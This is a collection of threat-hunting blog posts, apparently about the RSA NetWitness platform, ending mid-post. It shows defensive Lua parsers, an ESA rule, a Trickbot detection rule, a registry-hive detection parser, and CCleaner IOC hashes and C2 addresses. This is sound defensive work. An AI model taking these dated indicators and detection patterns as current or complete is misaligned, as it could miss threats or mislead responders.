
There are many reasons I enjoy working with the RSA NetWitness Platform, but things get really exciting when our customers turn their attention to threat hunting. In one case, a customer wanted to take new threat intelligence or research and apply it to their RSA NetWitness stack. This wasn't about threat intelligence via feeds, but about how attackers could deliver malicious content. Since there is never a shortage of threat research, one customer asked about detecting zero-width spaces.

 

A recent article in The Hacker News presented research showing that zero-width spaces embedded within URLs were able to bypass the URL scanners in Office 365. The question now is: how do we go about detecting this in NetWitness?

 

We begin with a search of our network using the following query:

 

Query
alias.host contains "​","‌","‍","","0"

 

This gave us several DNS sessions and a single SMTP session.

 

If we pivot into the SMTP session, we can get a slightly better view of the meta for that session.

 

That last hostname in 'alias.host' does look interesting, but we can't be sure yet. We need to examine the session more closely.

 

We rendered the session as an email and it bore the signs of a classic phishing email.

 

However, only when we examine the raw contents of the session does the malicious indicator present itself.

 

The bytes highlighted in red (E2 80 8C) represent the zero-width non-joiner character (U+200C). This appears to be the attacker's use of zero-width spaces as a bypass attempt in a phishing email. Next, we look at the meta data for the session.

 

Above, we can see our suspicious hostname, but how did it get there? It turns out that the 'phishing_lua' parser will examine URLs within SMTP traffic and extract the hostnames it finds into the 'alias.host' meta key. Fortunately for us, it included the zero-width space as part of the meta data...we just can't see it. Or can we?

 

I copied the meta value for the hostname and pasted it into my text editor. Sadly, I did not notice any strange characters. However, when I pasted it into my good friend 'vi', the hidden characters revealed themselves.

 

This proved that the zero-width spaces were in the meta data, which allowed our query to work successfully. The malicious site actually leads to a credential-stealing webpage. It appears that the website was a compromised WordPress site.

 

Next, I wanted a bigger data set. I took some of the meta data, such as the email address of the sender, and used it to find additional messages. As it turned out, this helped identify an active phishing campaign.

 

Next up was to put together some kind of detection going forward. My first thought was to use an application rule, but I was not successful. I think it was the way the Unicode was being interpreted or how it was input; I need to do more research on that. Since the app rule syntax was not working properly, I decided to build a Lua parser instead. The parser registers a meta callback on the "alias.host" meta key, just as an app rule would, then loops through a predefined list of zero-width space byte sequences against the returned meta value. If a match is made, it writes meta into the 'ioc' meta key.

 

lua_zws_check.lua

-- Step 1: Name the parser
local lua_zws_check = nw.createParser("lua_zws_check", "Check alias.host meta for zero-width spaces")

--[[
DESCRIPTION
    Check alias.host meta for zero-width spaces

VERSION
    2019-01-24 - Initial development

AUTHOR
    christopher.ahearn@rsa.com

DEPENDENCIES
    None

META KEYS
    ioc

NOTES
    https://thehackernews.com/2019/01/phishing-zero-width-spaces.html?m=1
    http://www.amp-what.com/unicode/search/zero%20width
--]]

-- Step 3: Define where your meta will be written
-- These are the meta keys that we will write meta into
lua_zws_check:setKeys({
    nwlanguagekey.create("ioc", nwtypes.Text),
})

-- Step 4: DO SOMETHING
-- UTF-8 byte sequences (Lua decimal escapes) for the characters of interest
local zws = {
    ["\226\128\139"] = true, -- U+200B zero width space
    ["\226\128\140"] = true, -- U+200C zero width non-joiner
    ["\226\128\141"] = true, -- U+200D zero width joiner
    ["\239\187\191"] = true, -- U+FEFF zero width no-break space
    ["\239\188\144"] = true, -- U+FF10 fullwidth digit zero
}

-- This is our function: what we want to do when we match a token...or in this case,
-- the alias.host meta callback.
function lua_zws_check:hostMeta(index, meta)
    if meta then
        for sequence in pairs(zws) do
            -- plain find (no pattern matching) against the byte sequence
            if string.find(meta, sequence, 1, true) then
                --nw.logInfo("*** BAD HOSTNAME CHECK: " .. meta .. " ***")
                nw.createMeta(self.keys["ioc"], "hostname_zero-width_space")
                break
            end
        end
    end
end

-- Step 2: Define your tokens
lua_zws_check:setCallbacks({
    [nwlanguagekey.create("alias.host")] = lua_zws_check.hostMeta, -- this is the meta callback key
})

 

 

After deploying the parser, I re-imported the new pcap file into my virtual packet decoder. The results came back quickly. I now had reliable detection for these zero-width space hostnames.

 

Since meta is displayed in the order in which it was written, we can get a sense as to the hostname that triggered this indicator.

 

Now that we had validated that the parser was working correctly in the lab environment, it was time to test some other capabilities of the NetWitness platform.

 

As we stated in the beginning, the query (as well as the parser) was flagging on DNS name resolutions that involved Unicode characters. Therefore, we wanted to alert only when the zero-width meta appeared in SMTP traffic. We then created an ESA rule in the lab environment.

 

To begin this alert, I went to the Configure / ESA Rules section in Netwitness and created a new rule using the Rule Builder wizard.

 

 

We gave the rule a name, which will be important in the next phase. Next, we created the condition by giving the condition a name and then populating the fields.

The first line is looking for the meta key and the meta value. The second is looking at the service type. Once it looks good, we hit save. We then hit save again and close out the rule.

 

NOTE: In the first line, you see the “Array?” box checked. Some meta keys are defined as arrays meaning they could contain multiple values in a session. The meta key ‘ioc’ is one such meta key. You may encounter a situation where a meta key should be set as an Array but is not. If that is the case, it is a simple change on the ESA configuration.
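For those who prefer to see the logic as code, the condition above is roughly equivalent to the hand-written EPL below. This is a sketch only: the Rule Builder generates additional module boilerplate and annotations around it, and the service value of 25 for SMTP is assumed from the scenario above.

zero_width_smtp (EPL sketch)

SELECT * FROM Event(
    /* 'ioc' is an array key, hence isOneOfIgnoreCase */
    isOneOfIgnoreCase(ioc, { 'hostname_zero-width_space' })
    AND service = 25
);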

 

Next, we want to deploy the rule to our ESA appliance. To do so, we clicked the ESA appliance in our deployments table.

Next, we add the rule we want to deploy. Then, we deploy it.

 

We then imported the PCAP again to see if our ESA rule fired successfully, which it did.

 

The last piece before production is to create an Incident rule, based on the ESA alerts. We move to Configure / Incident Rules and create a new rule.

I created the Incident rule in the lab and used the parameters shown below.

 

I then enabled the rule and saved it.

 

Now, when the incidents are examined in the Respond module, we can see our incidents being created.

 

To summarize this activity: we started from some new(ish) research and wanted to find a way to detect it in NetWitness. We found traffic that we were interested in and then built a Lua parser to improve our detection going forward. Next, I wanted to alert on this activity only when it appeared in SMTP traffic and, because I wanted to work on some automation, created an Incident rule to put a bow on it. We now have actionable alerting after a small bit of research on our end. My intent is to get the content of the parser added to one already in Live. Until that time, it will be here to serve as a reference.

 

What are your use cases? What are some things you are trying to find on the network that Netwitness can help with? Let us know.

 

Good luck and happy hunting.

Oftentimes, RSA NetWitness Packet decoders are configured to monitor not only ingress and egress traffic, but internal LAN traffic as well.  On a recent engagement, we identified a significant amount of traffic going to TCP port 9997.  It did not take long to realize this traffic was from internal servers configured to forward their logs to Splunk.

 

The parser will add to the 'service' meta key and write the value '9997'.  After running the parser for several hours, we also found other ports that were used by the Splunk forwarders.  
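For reference, a minimal sketch of the approach is below. It rests on two assumptions worth verifying in your own environment: that cooked-mode Splunk forwarder streams begin with the '--splunk-cooked-mode-v' banner, and that nw.setAppType is the right call to tag the service type, as it is in other service-identification parsers.

local splunk_fwd = nw.createParser("splunk_forwarder", "Identify Splunk forwarder traffic")

function splunk_fwd:cookedMode(token, first, last)
   -- 9997 is simply a label here; it matches the default forwarder port
   nw.setAppType(9997)
end

splunk_fwd:setCallbacks({
   -- Assumption: cooked-mode forwarder streams start with this banner
   ["--splunk-cooked-mode-v"] = splunk_fwd.cookedMode,
})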

 

While there wasn't anything malicious or suspicious about the traffic, it was a significant amount of data taking up disk space.  By identifying the traffic, we can make it a filtering candidate.  Ideally, the traffic would be filtered further upstream at a TAP, but sometimes that isn't possible.

 

If you are running this parser, you could also update the index-concentrator-custom.xml and add an alias to the service types.  

 

 

...

 

 

If you have traffic on your network that you want better ways to identify, let your RSA account team know.  

 

Good luck, and happy hunting.

I was recently working with Eric Partington, who asked if we could get Autonomous System Numbers from a recent update to GeoIP.  I believe at one point this was available as a feed, but it had been deprecated.  After a little research, I learned that an update to the Lua libraries allowed the calling of a new API function named geoipLookup, which would give us this information as well as some other data of interest.  A few years ago, I painstakingly created a feed for my own use to map countries to continents.  I wish I had had this function call back then.

 

The API call is as follows:

 

geoipLookup

-- Examples:
-- local continent = self:geoipLookup(ip, "continent", "names", "en") -- string
-- local country = self:geoipLookup(ip, "country", "names", "en") -- string
-- local country_iso = self:geoipLookup(ip, "country", "iso_code") -- string "US"
-- local city = self:geoipLookup(ip, "city", "names", "en") -- string
-- local lat = self:geoipLookup(ip, "location", "latitude") -- number
-- local long = self:geoipLookup(ip, "location", "longitude") -- number
-- local tz = self:geoipLookup(ip, "location", "time_zone") -- string "America/Chicago"
-- local metro = self:geoipLookup(ip, "location", "metro_code") -- integer
-- local postal = self:geoipLookup(ip, "postal", "code") -- string "77478"
-- local reg_country = self:geoipLookup(ip, "registered_country", "names", "en") -- string "United States"
-- local subdivision = self:geoipLookup(ip, "subdivisions", "names", "en") -- string "Texas"
-- local isp = self:geoipLookup(ip, "isp") -- string "Intermedia.net"
-- local org = self:geoipLookup(ip, "organization") -- string "Intermedia.net"
-- local domain = self:geoipLookup(ip, "domain") -- string "intermedia.net"
-- local asn = self:geoipLookup(ip, "autonomous_system_number") -- uint32 16406
function parser:geoipLookup(ipValue, category, [name], [language]) end

 

As you know, we already get many of these fields.  Meta keys such as country.src, country.dst, org.src, and org.dst are probably well known to many analysts and used for various queries.  Eric had asked for 'asn' and, because I had tried it previously with a feed, I wanted to include 'continent' as well.

 

So... I created a Lua parser to get this for me.  My tokens were meta callbacks for ip.src and ip.dst.

 

[nwlanguagekey.create("ip.src", nwtypes.IPv4)] = lua_geoip_extras.OnHostSrc,
[nwlanguagekey.create("ip.dst", nwtypes.IPv4)] = lua_geoip_extras.OnHostDst,

 

My intent was to build this parser to work on both packet and log decoders.  I had originally wanted to use another function call, but found it was not working properly on log decoders.  However, the meta callbacks for ip.src and ip.dst did work.  With this in mind, I could leverage this parser on both packet and log decoders. :-)

 

The meta keys I was going to write into were as follows:

 

nwlanguagekey.create("asn.src", nwtypes.Text),
nwlanguagekey.create("asn.dst", nwtypes.Text),
nwlanguagekey.create("continent.src", nwtypes.Text),
nwlanguagekey.create("continent.dst", nwtypes.Text),

 

Since I was using ip.src and ip.dst meta, I wanted to apply the same source and destination meta for my asn and continent values.  

 

Then, I just wrote out my functions:

 

-- Get ASN and Continent information from ip.src and ip.dst
function lua_geoip_extras:OnHostSrc(index, src)
   local asnsrc = self:geoipLookup(src, "autonomous_system_number")
   local continentsrc = self:geoipLookup(src, "continent", "names", "en")

   if asnsrc then
      --nw.logInfo("*** ASN SOURCE: AS" .. asnsrc .. " ***")
      nw.createMeta(self.keys["asn.src"], "AS" .. asnsrc)
   end
   if continentsrc then
      --nw.logInfo("*** CONTINENT SOURCE: " .. continentsrc .. " ***")
      nw.createMeta(self.keys["continent.src"], continentsrc)
   end
end

 

function lua_geoip_extras:OnHostDst(index, dst)
   local asndst = self:geoipLookup(dst, "autonomous_system_number")
   local continentdst = self:geoipLookup(dst, "continent", "names", "en")

   if asndst then
      --nw.logInfo("*** ASN DESTINATION: AS" .. asndst .. " ***")
      nw.createMeta(self.keys["asn.dst"], "AS" .. asndst)
   end
   if continentdst then
      --nw.logInfo("*** CONTINENT DESTINATION: " .. continentdst .. " ***")
      nw.createMeta(self.keys["continent.dst"], continentdst)
   end
end

 

This was my first time using this new API call, and my mind was racing with ideas about how else I could use this capability.  The one that immediately came to mind was enriching meta when X-Forwarded-For or Client-IP headers exist.  When they do, the value should be parsed into a meta key called "orig_ip" today, or "ip.orig" in the future.  The meta key "orig_ip" is formatted as Text, so I need to account for that by determining the correct host type; we don't want to pass a domain name when we are expecting an IP address.  I can do that by importing the functions from 'nwll'.
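A minimal sketch of that idea is below. The pattern check stands in for the 'nwll' host-type helpers, it assumes geoipLookup will accept a Text value holding a dotted-quad address, and the 'orig_ip' callback registration and the reuse of 'asn.src' are illustrative only.

-- Illustrative: enrich orig_ip (Text) the way ip.src/ip.dst are enriched
local function isIPv4(value)
   local a, b, c, d = string.match(value, "^(%d+)%.(%d+)%.(%d+)%.(%d+)$")
   if not a then return false end
   for _, octet in ipairs({a, b, c, d}) do
      if tonumber(octet) > 255 then return false end
   end
   return true
end

function lua_geoip_extras:OnOrigIP(index, orig)
   -- Only look up values that are actually IPv4 addresses, not hostnames
   if orig and isIPv4(orig) then
      local asn = self:geoipLookup(orig, "autonomous_system_number")
      if asn then
         nw.createMeta(self.keys["asn.src"], "AS" .. asn)
      end
   end
end

-- Registered alongside the ip.src/ip.dst callbacks:
-- [nwlanguagekey.create("orig_ip", nwtypes.Text)] = lua_geoip_extras.OnOrigIP,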

 

In the past, the only meta that could be enriched by GEOIP was ip.src and ip.dst (I have not tested ipv6.src or ipv6.dst).  Now with this API call, I can apply the content of GEOIP to other IP address related meta keys.  I have attached the full parser to this post.  

 

Hope this helps others out there in the community and as always, happy hunting.

 

Chris

Over the past several years, I have found quite a lot of incredibly useful meta packed into the 'query' meta key.  The HTTP parser puts arguments and passed variables there when they are used in GETs and POSTs.  Examining some recent PCAPs from the Malware Traffic Analysis site, there are some common elements we can use to identify Trickbot infections.  This was not an exhaustive look at Trickbot, but simply a means to identify some common traits as meta values.  As Trickbot, or any malware campaign, changes, IOCs will need to be updated.

 

First things first, let's look at the index level for the 'query' meta key.  By default, the 'query' meta key is set to 'IndexKeys'.  This means that you could perform a search where the key existed in a session, but could not query for the values stored within that key.

 

 

There are pros and cons to setting the index level to 'IndexValues' in your 'index-concentrator-custom.xml' file on your concentrators.  The pros include being able to search for those values during an investigation.  The cons are that such queries would likely involve 'contains', which is expensive from a performance perspective.  Furthermore, 'query' is a Text-formatted meta key limited to 256 bytes; anything after 256 bytes is truncated, so you may not have the complete query string.
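If you do choose 'IndexValues', the entry in 'index-concentrator-custom.xml' would look something like the line below (the valueMax shown is illustrative; size it for your environment):

<key description="Query" format="Text" level="IndexValues" name="query" valueMax="250000"/>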

 

Whether 'query' is set to 'IndexKeys' or 'IndexValues' or even 'IndexNone', we can take advantage of it in App rule creation.  In one Trickbot pcap, we can see an HTTP POST to an IP address on a non-standard port.

 

 

If we look at the meta created for this session, we can see the 'proclist' and 'sysinfo' as pieces in the 'query' meta.

 

 

Combining these with a service type (service = 80) and an action (action = 'post'), we can create an application rule that can help find Trickbot infections in the environment.  For good measure, we can add additional meta from analysis.service to help round it out.

 

 

Trickbot application rule
service = 80 && action = 'post' && query = 'name="sysinfo"' && query = 'name="proclist"' && analysis.service = 'windows cli admin commands'

 

 

The flexibility of app rule creation allows analysts and threat hunters to take a handful of indicators (meta) and combine them to make detection easier.

 

 

Once a threat is identified, we can use this method to find the traffic more easily moving forward, freeing us to go find the next new bad thing.  If the app rule fires too often on normal traffic, we can adjust it to add or exclude other meta to ensure it is firing correctly.

 

As always, good luck, and happy hunting.

 

Chris

I was reviewing a packet capture file I had from a recent engagement. In it, the attacker had tried unsuccessfully to compress the System and SAM registry hives on the compromised web server. Instead, the attacker decided to copy the hives into a web accessible directory and give them a .jpg file extension. Given that the Windows Registry hives contain a well documented file structure, I decided to write a parser to detect them on the network.

 

 

If we see something on the wire, there is a pretty good chance we can create some content to detect it in the future. This is the premise behind most threat-hunting or content creation. Make it easier to detect the next time. This is the same approach I take when building Lua Parsers for the RSA NetWitness platform.

 

Here, we can see what appears to be the magic bytes for a registry file “regf”.

 

 

Let’s shift our view into View Hex and examine this file.

 

 

When creating a parser, we want to make it as consistent as possible to reduce false positives and errors. What I found was that immediately following the 'regf' signature, the Primary Sequence Number (4 bytes) and Secondary Sequence Number (4 bytes) would differ from file to file, and the FileTime UTC field (8 bytes) that follows them would most definitely be unique.
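For reference, here is the relevant portion of the hive header, with offsets from the start of the file ('varies' marks the fields we need to skip):

-- 0x00  "regf" signature          (4 bytes)  <-- our token
-- 0x04  primary sequence number   (4 bytes)  varies
-- 0x08  secondary sequence number (4 bytes)  varies
-- 0x0C  FileTime UTC              (8 bytes)  varies
-- 0x14  major version             (4 bytes)  typically 0x01000000 on the wire
-- 0x18  minor version             (4 bytes)  0x03000000 through 0x06000000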

 

However, the Major and Minor versions were relatively consistent. Therefore, I could skip over those 16 bytes of variable data to land on the first byte of the Major Version immediately after my initial token matches.  Let's create a token to start with.

 

fingerprint_reg:setCallbacks({

   ["\114\101\103\102"] = fingerprint_reg.magic,   -- regf

}) 

 

If you notice, this token is written with DECIMAL escapes, not HEX. Also, 4 bytes is quite small for a token. When a parser is loaded onto the decoder, its tokens are held in memory and compared as network traffic flows through. Once a token matches, the function(s) within the parser run. Too small a token means the parser may run quite frequently, with or without matching the right traffic. Too large a token means the parser may only run on those specific bytes, and you could miss other relevant traffic. When creating a parser token, you may want to err on the side of caution and make it a little smaller, knowing that you will have to add additional checks to ensure it is the traffic you want.

 

In Lua for parsers, you are always on a byte. Therefore, we need to know where we are and where we want to go. I like to set a variable called 'current_position' to denote where my pointer is in the stream of data. When the parser matches on a token, it returns three values: the token itself, the position of the token's first byte in the data stream, and the position of its last byte. This helps me because I want to find the 'regf' token and move forward 17 bytes to land on the Major Version field.

 

function fingerprint_reg:magic(token, first, last)
    current_position = last + 17
    local payload = nw.getPayload(current_position, current_position + 7)
    if payload and #payload == 8 then
        local majorversion = payload:uint32(1, 4)
        if majorversion == 16777216 then
            local minorversion = payload:uint32(5, 8)
            if minorversion == 50331648 or minorversion == 67108864 or minorversion == 83886080 or minorversion == 100663296 then
                nw.createMeta(self.keys["filetype"], "registry hive")
            end
        end
    end
end

This will put the pointer on the first byte (0x01) of the Major Version field. Next what I want to do is extract only the payload I need to do my next set of checks, which will involve reading the bytes.

 


 

Here, I created a variable called ‘payload’ and used the built-in function ‘nw.getPayload’ to get the payload I wanted. Since I previously declared a variable called ‘current_position’, I use that as my starting point and tell it to go forward 7 bytes. This gives me a total of 8 bytes of payload. Next, I make sure that I have payload and that it is, in fact, 8 bytes in length (#payload == 8).

 


 

 

If the payload checks out, then in this parser, I want to read the first 4 bytes, since that should be the Major Version. In the research I did, I saw that the Major Version was typically ‘1’ and was represented as ‘0x01000000’. Since I want to read those 4 bytes, I use “payload:uint32(1,4)”. Since those bytes will be read in as one value, I pre-calculate what that should be and use it as a check. The value should be ‘16777216’. If it is, then it should move to the next check.

 


 

The Minor Version check winds up being the second and last check to make sure it is a Registry hive. For this to run, the Major version had to have been found and validated based on the IF statement. Here, we grab the next 4 bytes and store those in a variable called ‘minorversion’. There were four possible values that I found in my research. Those would be ‘0x03000000’, ‘0x04000000’, ‘0x05000000’, and ‘0x06000000’. Therefore, I pre-calculated those values in decimal form like I did with the Major Version and did a comparison (==). If the value matched, then the parser will write the text ‘registry hive’ as meta into the ‘filetype’ meta key.

 

The approach shown here was useful for examining a particular type of file as observed in network traffic. The same approach could be used for protocol analysis, identifying new service types, and much more.  If you would like expert assistance with creating a custom parser for traffic that is unique to your environment, that is a common service offering provided by RSA; please feel free to contact your local sales rep.

 

The parser is attached, and I have also submitted it to RSA Live for future use.  I hope you find this parser breakdown helpful and as always, happy hunting.

 

Chris

Servers are attacked every day and sometimes those attacks are successful.  A lot of attention is paid to Windows executables that come down the wire, but I also wanted to know when my systems were downloading ELF files, typically used by Linux systems.  With some recent exploits targeting Linux web servers and delivering crypto-mining software, I wrote a parser that attempts to identify Linux ELF files and places that meta in the 'filetype' meta key.
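The parser follows the same fingerprinting pattern as the registry hive parser described in an earlier post: match the magic bytes, then sanity-check the following header fields before writing meta. A minimal sketch is below; the attached parser performs more validation, the uint8 reads assume the payload API mirrors the uint32 call shown previously, and the meta value is illustrative.

local fingerprint_elf = nw.createParser("fingerprint_elf", "Identify ELF executables")

fingerprint_elf:setKeys({
   nwlanguagekey.create("filetype", nwtypes.Text),
})

function fingerprint_elf:magic(token, first, last)
   -- Read the two bytes after the \127ELF magic: EI_CLASS and EI_DATA
   local payload = nw.getPayload(last + 1, last + 2)
   if payload and #payload == 2 then
      local class = payload:uint8(1)  -- 1 = 32-bit, 2 = 64-bit
      local data  = payload:uint8(2)  -- 1 = little-endian, 2 = big-endian
      if (class == 1 or class == 2) and (data == 1 or data == 2) then
         nw.createMeta(self.keys["filetype"], "elf executable")
      end
   end
end

fingerprint_elf:setCallbacks({
   ["\127ELF"] = fingerprint_elf.magic,  -- 0x7F 'E' 'L' 'F'
})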

 

 

 

This isn't limited to crypto-mining ELF files and has detected many others in testing.  The parser is attached below.

 

I hope you find this parser useful, and as always, happy hunting.

 

Chris

Whenever I am on an engagement that involves the analysis of network traffic, my preferred tool of choice is the RSA NetWitness Network (Packets) solution.  This provides full packet capture and allows for analysts to "go back to the video tape" to see what happened on the wire.  When the decoder examines the traffic, it tries to identify the service type associated with it.  HTTP, DNS, SSL and many others are some examples.  However, there are times when there is no defined service.  This results in 'service = 0'.  

 

When time allows, I like to go in there, but as you may notice, there can be quite a lot of data to go through.  Therefore, I like to focus on small slices of time and attributes about those sessions that make sense.  For example, I might choose the following query over the last 3 hours.

 

   service = 0 && ip.proto = 6 && direction = 'outbound' && tcpflags = 'syn' && tcpflags = 'ack' && tcpflags = 'psh'

 

This query will get to the sessions where:

   service = 0 [OTHER traffic not associated with a service type]

   ip.proto = 6 [TCP traffic]

   direction = 'outbound' [traffic that starts internally and destined for public IP space]

   tcpflags = [Focus on SYN, ACK, and PSH because those TCP flags would have to be present for the starting of a session and the sending of data]

 

Next, I look at the associated TCP ports (tcp.srcport and tcp.dstport) as well as some IPs and org.dst meta.  What we recently found was a pipe-delimited medical record in clear text.  After some additional research, we came across a fantastic blog post from Tripwire discussing Health Level 7 (HL7).  In it, the author, Dallas Haselhorst, even showed the pipe-delimited format that the HL7 protocol uses to transfer this data.  It was this format that was observed on the wire.

 

While the idea of medical records being transmitted on the wire in clear text was alarming at first, it was determined that this was, in fact, a standard practice.  When the data has to cross the Internet, VPN tunnels would be used.

 

To get a sense of how much of this traffic I could see, I created a parser to identify it as 'service = 6046'.  I chose '6046' because that was the first port I observed; in truth, we eventually saw it on numerous values of tcp.dstport.  This parser just identifies the traffic as HL7 and does not parse out the information contained in the fields.  Some of that data would likely contain Personal Health Information, and that is not something I wanted as meta.  But knowing it is on the wire in the clear was important to me and my client.
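The core of such a parser is small. HL7 v2 messages begin with an MSH segment whose literal first bytes are 'MSH|^~\&', which makes a reasonable token; the sketch below only tags the service type and deliberately creates no meta from the message content. The use of nw.setAppType mirrors other service-identification parsers.

local hl7_id = nw.createParser("HL7_id", "Identify HL7 traffic")

function hl7_id:msh(token, first, last)
   -- Tag the session only; do not extract fields, which may contain PHI
   nw.setAppType(6046)
end

hl7_id:setCallbacks({
   ["MSH|^~\\&"] = hl7_id.msh,  -- HL7 v2 segment header plus encoding characters
})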

 

If you work in an organization that handles this kind of data, this parser might help identify and validate where it's going.  

 

Good luck, and happy hunting.  Also..special thanks to one of my new team-mates, Jeremy Warren, who helped find this traffic.

 

Chris

If you attended my sessions on Lua Parsing in NetWitness, we referenced some materials as well as a parser template I use when starting to write a Lua parser.  I wanted to share that material here.  Be sure to check out the examples as well as the nw-api.lua as references when building your own.

 

As always, if you have questions, please reach out.

 

Thanks,

 

Chris

By now the InfoSec community has had a chance to digest the recent findings around the popular software CCleaner and a compromised version of it.  Great research was provided by the TALOS Intelligence group here and here.  The question on the minds of senior leadership becomes: what could the impact be to the organization?  The ability to query the systems in the enterprise for such threats is essential to answering that business-impact question.  Avast posted additional findings in their own blog, and that is where our post begins.

 

Avast provided several indicators of compromise (IOCs) that allow security teams to quickly scan their environment for known or suspicious files or communications.  Let's start with the first-stage indicators.

 

There were twenty (20) SHA256 hashes of files in the list.  Since the list was not in a particular format (STIX, TAXII, CSV, etc.), we can scrape them from the page and paste them into our old friend "vi".

 

 

Essentially, what we need to do is get the provided indicators into a form that our tools can use.  Our first attempt is to just show the hash itself.

 

      awk -F' - ' '{print $1}' ccleaner

 

 

We can then go over to NetWitness Endpoint looking for these hashes.  One approach is to look for all instances of 'ccleaner' in the Global Modules view and check the SHA256 hash values.  Sometimes looking at the Compile Time is also helpful.

 

You can also go into the Filter Editor and enter the hashes here as well.  

 

Another option is performing the query directly against the SQL database.  Similar to the Filter Editor method above, we simply need to get the query built in a way that works.  Since it will be a large OR statement, we just need the right syntax and the location where the values are stored.  The hashes are stored in the database in dbo.Modules.HashSHA256.  Knowing this, we can generate the necessary syntax with our other good friend, 'awk'.

 

      awk -F" - " '{print "OR mo.HashSHA256 = 0x"$1}' ccleaner

 

NOTE:  "OR mo.HashSHA256 = 0x" was prepended to query that column.  "0x" was also prepended to each hash because the data is stored that way.

 

This returns the values in a form that I can easily query.  Now, I just need the query.

 

Module_Hash_to_MachineName

--Search for a machinename based on the hash of a module

select mn.machinename, mo.HashSHA256

from

    [dbo].[MachineModulePaths] AS mp

    INNER JOIN [dbo].[Machines] AS [mn] WITH(NOLOCK) ON ([mn].[PK_Machines] = [mp].[FK_Machines])

    INNER JOIN [dbo].[Modules] AS [mo] WITH(NOLOCK) ON ([mo].[PK_Modules] = [mp].[FK_Modules])

where

    --mo.HashMD5 = 0xCEDC22719DE1B1316BDC556FED989335

    --mo.HashSHA256 = 0x069F24378A0A6EEA078D30D971542741D0F51E1F933EEEB23FDB559763FF0ACD

    --mo.HashSHA1 = 0x39E0F0F2F64B50FB9783A49B7940BF326D7B6B65

 

-- First Stage

mo.HashSHA256 = 0x04bed8e35483d50a25ad8cf203e6f157e0f2fe39a762f5fbacd672a3495d6a11

OR mo.HashSHA256 = 0x0564718b3778d91efd7a9972e11852e29f88103a10cb8862c285b924bc412013

OR mo.HashSHA256 = 0x1a4a5123d7b2c534cb3e3168f7032cf9ebf38b9a2a97226d0fdb7933cf6030ff

OR mo.HashSHA256 = 0x276936c38bd8ae2f26aab14abff115ea04f33f262a04609d77b0874965ef7012

OR mo.HashSHA256 = 0x2fe8cfeeb601f779209925f83c6248fb4f3bfb3113ac43a3b2633ec9494dcee0

OR mo.HashSHA256 = 0x3c0bc541ec149e29afb24720abc4916906f6a0fa89a83f5cb23aed8f7f1146c3

OR mo.HashSHA256 = 0x4f8f49e4fc71142036f5788219595308266f06a6a737ac942048b15d8880364a

OR mo.HashSHA256 = 0x7bc0eaf33627b1a9e4ff9f6dd1fa9ca655a98363b69441efd3d4ed503317804d

OR mo.HashSHA256 = 0xa013538e96cd5d71dd5642d7fdce053bb63d3134962e2305f47ce4932a0e54af

OR mo.HashSHA256 = 0xbd1c9d48c3d8a199a33d0b11795ff7346edf9d0305a666caa5323d7f43bdcfe9

OR mo.HashSHA256 = 0xc92acb88d618c55e865ab29caafb991e0a131a676773ef2da71dc03cc6b8953e

OR mo.HashSHA256 = 0xe338c420d9edc219b45a81fe0ccf077ef8d62a4ba8330a327c183e4069954ce1

OR mo.HashSHA256 = 0x36b36ee9515e0a60629d2c722b006b33e543dce1c8c2611053e0651a0bfdb2e9

OR mo.HashSHA256 = 0x6f7840c77f99049d788155c1351e1560b62b8ad18ad0e9adda8218b9f432f0a9

OR mo.HashSHA256 = 0xa3e619cd619ab8e557c7d1c18fc7ea56ec3dfd13889e3a9919345b78336efdb2

OR mo.HashSHA256 = 0x0d4f12f4790d2dfef2d6f3b3be74062aad3214cb619071306e98a813a334d7b8

OR mo.HashSHA256 = 0x9c205ec7da1ff84d5aa0a96a0a77b092239c2bb94bcb05db41680a9a718a01eb

OR mo.HashSHA256 = 0xbea487b2b0370189677850a9d3f41ba308d0dbd2504ced1e8957308c43ae4913

OR mo.HashSHA256 = 0x3a34207ba2368e41c051a9c075465b1966118058f9b8cdedd80c19ef1b5709fe

OR mo.HashSHA256 = 0x19865df98aba6838dcc192fbb85e5e0d705ade04a371f2ac4853460456a02ee3

 

-- Second Stage

 

OR mo.HashSHA256 = 0xdc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83

OR mo.HashSHA256 = 0xa414815b5898ee1aa67e5b2487a11c11378948fcd3c099198e0f9c6203120b15

OR mo.HashSHA256 = 0x7ac3c87e27b16f85618da876926b3b23151975af569c2c5e4b0ee13619ab2538

OR mo.HashSHA256 = 0x4ae8f4b41dcc5e8e931c432aa603eae3b39e9df36bf71c767edb630406566b17

OR mo.HashSHA256 = 0xb3badc7f2b89fe08fdee9b1ea78b3906c89338ed5f4033f21f7406e60b98709e

OR mo.HashSHA256 = 0xa6c36335e764b5aae0e56a79f5d438ca5c42421cae49672b79dbd111f884ecb5

 

I added the second stage hashes as well.  This query returns some results that would need additional checking.  

 

 

Next, we can move over to NetWitness for Packets and Logs and see if we have any hits.

 

      ip.dst=216.126.225.148,216.126.225.163

 

 

No hits here, thankfully.  

 

There were also some algorithmically generated domains (DGA domains) in the listing of IOCs.  Using "vi" again, we copied the contents into a file as before.

 

 

Then, using a similar "awk" statement we generate the query for use in the NetWitness suite.

 

      awk -F" - " '{print "\x27"$1"\x27,"}' c2 | sed 's/ //g' | tr -d '\n'

 

NOTE: \x27 prints a single quote

sed 's/ //g' removes some trailing whitespace as a result of the copy/paste.

tr -d '\n' removes the new line so they all appear on the same line.

 

Armed with this syntax, I can copy and paste into NetWitness.  Since we are querying the same key for multiple values, we can separate them with commas.  However, since we are using "alias.host", which is a Text-formatted meta key, we need to ensure the values are enclosed in quotes in our query.

 

 

Again, no findings.

 

The presence of compromised files might mean declaring an incident and launching a larger forensic investigation, depending on the organization.  At this point, we know the files were here, but based on currently available research, we might not have been a target.

 

In summary, searching for indicators of compromise using the NetWitness suite is a great first step in identifying potential problems in your environment.  Sometimes the data isn't provided in an easy-to-use format; however, with some quick command-line techniques, you can massage that data into a format ready to query.  This whole exercise took only a few moments to complete, and we can begin to answer what the impact is to the business.

 

As always, know your data and happy hunting.

 

Chris

 

If you did identify the presence of these or other suspicious or compromised files in your organization, our RSA Incident Response team is here to assist with the triage.  If you have an IR Retainer in place with RSA then you already have rapid access to our analysts who can get engaged and rapidly identify the scope of the incident.  If you don’t have an IR Retainer or are interested in learning more about our Incident Response services, please visit our Incident Response Services page on RSA.com

Recently, I was using NetWitness Endpoint (ECAT) to help triage a large environment.  During this time, I identified a few systems that were exploited by a malicious HTML file.  It was part of a phishing campaign that came in via email.  Unfortunately, I was unable to find the file because it was no longer in the Outlook Temporary Internet Files folder.  However, since we had tracking data coming in from the agents, I was able to recreate the scene even without the initial malicious code.

 

The original compromise showed tracking data like the one below:

 

 

